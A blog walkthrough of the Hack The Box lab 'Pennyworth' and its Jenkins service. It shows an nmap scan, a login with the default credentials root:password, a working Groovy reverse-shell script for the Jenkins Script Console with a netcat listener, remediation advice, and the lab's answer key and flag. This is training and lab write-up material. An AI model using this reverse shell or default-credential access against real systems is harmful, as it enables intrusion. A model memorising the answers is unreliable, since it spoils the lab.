HacktheBox Write up — Pennyworth

13xch
7 min readOct 26, 2023

Background

The “Pennyworth” box is a very easy box involving use of publicly known CVEs, or “Common Vulnerabilities and Exposures.” Knowing how to read and understand writeups and exploits on these so-called CVEs can prove tremendously helpful.

This box, being a linux machine, is focused around exploiting a CVE with a high CVSS (Common Vulnerability Scoring System) score. The attacker’s goal here is to gain arbitrary remote command execution (ARCE).

Methodology

Enumeration

To begin this box, we will utilize the command-line tool nmap.

Nmap, short for “Network Mapper,” is a powerful and widely used open-source network scanning tool that helps identify hosts and services on a network. It provides information about open ports, running services, and can even perform advanced tasks like OS fingerprinting and vulnerability detection.

nmap -sV -sC 10.129.233.235 #note - your target ip will vary

The Nmap option “-sV” is used for service version detection. When someone uses Nmap with this option, they aim to determine not only which services are running on a target system but also to identify their specific versions.

The “-sC” option in Nmap is used to enable a set of default Nmap scripts, which are also referred to as “Nmap Scripting Engine” (NSE) scripts. When you use “-sC” in conjunction with an Nmap scan, it instructs Nmap to run a set of commonly used and general-purpose scripts designed to perform a variety of tasks on the target system.

This nmap scan pulled up the following results:

From this, we can gather than port 8080 is running. As we used -sV, we can also see the versions of software running on this port — Jetty 9.4.39.v20210325.

Interesting, the only service running on this box is an http service. Let’s check out this IP in our browser to see what we can find.

Nice, we get a log-in screen for a platform called “Jenkins.”

Jenkins is an automation server used for building and deploying software projects. It enables users to define and manage automation workflows using Groovy scripting in Jenkins Pipelines, allowing for the automation of tasks such as code building, testing, and deployment.

A log-in screen is a welcome sight when searching for vulnerabilities in a machine, as it opens the door to using credentials left as default. There are many databases with default credentials for various programs — I use Default Passwords | CIRT.net

After looking more into this software on the documentation page, I found that it is a platform used in software development. Searching around for default sets of credentials, we found that “root:password” works.

Foothold

Now that we have administrator access to this platform, we can poke around, resulting in finding the Jenkins Script console, which can be used to run commands remotely.

The Jenkins Script Console is a built-in feature that allows administrators and advanced users to execute arbitrary scripts on a Jenkins server. It’s primarily used for debugging, troubleshooting, and configuring Jenkins, and it can interact with Jenkins through its APIs, making it a powerful tool for system administrators. However, access to the Script Console should be tightly controlled, as it can potentially be used to make significant changes to Jenkins and its configurations.

As we have access to this, we can attempt to execute a command that will provide us with a reverse shell back to our local machine.

A reverse shell is a type of shell connection established by a target computer to a remote attacker, typically over the internet or a network. It is called a “reverse” shell because it’s the opposite of the more common scenario where an attacker connects to a vulnerable target to gain control.

After looking around for Groovy scripts that can be executed to execute a reverse shell command, we find one hosted on this github page.

String host="localhost";
int port=8000;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Note: Be sure to change the local host and port to whatever one you will be using.

Before running this script, we need to start our netcat listener on another linux terminal instance.

nc -lvnp 8000 #replace the port with your listening port of choice

nc: This is the “netcat” command, a versatile networking utility that can be used for various network-related tasks, including reading and writing data across network connections.

-l: This option tells netcat to listen for incoming connections. In other words, it makes the system act as a server, waiting for clients to connect to it.

-v: This option stands for “verbose” and makes netcat display more detailed information about the connection, such as when a client connects or data is transmitted.

-n: This option is used to prevent DNS name resolution. It ensures that IP addresses are used instead of attempting to resolve hostnames.

-p port: Here, “port” should be replaced with the specific port number you want to listen on. This is the port where incoming connections will be accepted.

After hitting run, we see that a connection has been initiated.

We now have a shell with the target machine on our local machine, and can execute commands to navigate through the storage system to find the flag.

Flag: 9cdfb439c7876e703e307864c9167a15

As we are root user, there is no lateral movement and no privilege escalation required of us. More complex labs will have additional steps that require using more advanced exploits.

Risks and Recommendations

In this box, there is one major issue that is present — a default administrator credential set left unconfigured.

After we found that the web server was running a version of Jenkins, all we had to do was look up Jenkins default credentials, and after 3 clicks, we were granted full administrator access.

Another possible vulnerability was the fact that any input in the Jenkins Groovy Script Console. This opens the door to loads of potential malicious script input, which can have drastic effects on the machine.

A possible solution to guard against this is to, if possible, disable the Jenkins Script Console for users, or if this is not possible due to a need for it, simply having a whitelist of allowed commands and scripts. This is done by using a script security plug-in.

Summary

In all, this lab was an easy to crack box that involved a password left misconfigured. As an IS professional, it is important to have a strong password policy, or else threat actors can easily gain access to your confidential information.

HTB Solutions

Question 1: What does the acronym CVE stand for?

Common Vulnerabilities and Exposures

Question 2: What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for? Use commas between each word.

confidentiality, integrity, availability

Question 3: What is the version of the service running on port 8080?

Jetty 9.4.39.v20210325

Question 4: A common administrator username has left a default password of “password” in place. Which user is that?

root

Question 5: What version of Jenkins is running on the target?

Jenkins 2.289.1

Question 6: What type of script is accepted as input on the Jenkins Script Console?

Groovy

Question 7: What is the path of the Jenkins script console?

/script

Question 8: What is a different command than “ip a” we could use to display our network interfaces’ information on Linux?

ifconfig

Question 9: What switch should we use with netcat for it to use UDP transport mode?

-u

Question 10: What is the term used to describe making a target host initiate a connection back to the attacker host and then accepting commands and executing them?

reverse shell

Question 11: Submit the flag located in root’s home directory.

9cdfb439c7876e703e307864c9167a15

Note: Please only use these answers as a last resort, entering these without at least attempting to solve it yourself is a waste of time and will not help you learn and develop your skills as an ethical hacker.

Keywords

Ethical hacking case study, Penetration testing findings, HTB box analysis, Vulnerability assessment report, HTB answers, Cybersecurity testing insights, Hack The Box report, Penetration tester’s analysis, HTB challenge resolution, Ethical hacking techniques, Security assessment report, Hacker’s perspective on HTB, Network penetration testing, Exploitation and remediation, Hack The Box success story, Ethical hacking best practices, Vulnerability identification, Real-world hacking scenario, Penetration testing case study, Practical hacking lessons, htb pennyworth

--

--

13xch

Cybersecurity student and tech enthusiast. Exploring the intersection of technology and business.🌐🔐